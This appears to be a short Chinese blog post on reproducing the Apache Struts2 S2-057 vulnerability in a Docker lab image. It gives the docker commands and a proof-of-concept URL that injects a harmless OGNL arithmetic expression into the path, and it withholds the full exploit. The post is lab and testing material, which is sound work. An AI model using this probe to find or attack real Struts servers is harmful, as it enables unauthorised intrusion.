http://vulapps.evalbug.com/s_struts2_s2-057/

这大概是全网复现st2-057环境最简单的操作了。

不过首先,你需要安装过docker,安装方法参考官方文档https://docs.docker.com/,很详细了。然后执行:

docker pull medicean/vulapps:s_struts2_s2-057

docker run -d -p 8083:8080 medicean/vulapps:s_struts2_s2-057

1.访问目标http://IP:8083/

POC:

>访问 http://127.0.0.1:8083/${(111+111)}/actionChain1.action

然后 URL 会变为 : http://127.0.0.1:8083/222/register2.action, 其中 222 部分为 ognl 表达式 ${(111+111)} 执行结果。

EXP:

暂不公布

st2_057的更多相关文章

随机推荐

  1. ubuntu 使用旧式Gnome风格的菜单

    sudo apt-add-repository ppa:diesch/testing sudo apt-get update sudo apt-get install classicmenu-indi ...

  2. React+Webpack+Webstorm开发环境搭建

    需要安装的软件 node.js npm包管理 Webstorm 由于6.3.0版本之后会自带npm的包管理所以不需要单独的安装npm nodejs(包含npm)安装在默认路径C:\Program Fi ...

  3. msm audio platform 驱动代码跟踪

    sound/soc/soc-core.c static int __init snd_soc_init(void) { #ifdef CONFIG_DEBUG_FS snd_soc_debugfs_r ...

  4. Houdini技术体系大纲

    Houdini for UE4 Pipeline的系列教程,前言等想好再写吧

  5. winscp的root连接ubuntu“拒绝访问”的解决方法

    转载:https://www.cnblogs.com/weizhxa/p/10098640.html 解决: 1.修改ssh配置文件:sudo vim etc/ssh/sshd_config 在#Pe ...

  6. Adding ASP.NET MVC5 Identity Authentication to an existing project

    Configuring Identity to your existing project is not hard thing. You must install some NuGet package ...

  7. Android的TextView设置加粗对汉字无效

    //not work textView.setTypeface(Typeface.defaultFromStyle(Typeface.BOLD)); //work! static public voi ...

  8. OpenGL——OpenCV与SOIL读取图片进行纹理贴图

    使用OpenCV读取图片代码如下 img = imread(m_fileName); if (img.empty()) { fprintf(stderr, "Can not load ima ...

  9. 如何查看MySQL单个数据库或者表的大小

    总体来说,这些信息存在于information_schema数据库的TABLES表中 mysql> desc information_schema.TABLES; +-------------- ...

  10. 在浏览器上使用 react

    unpkg material-ui mobx react-router-dom 所有包为开发环境使用 <!DOCTYPE html> <html lang="en" ...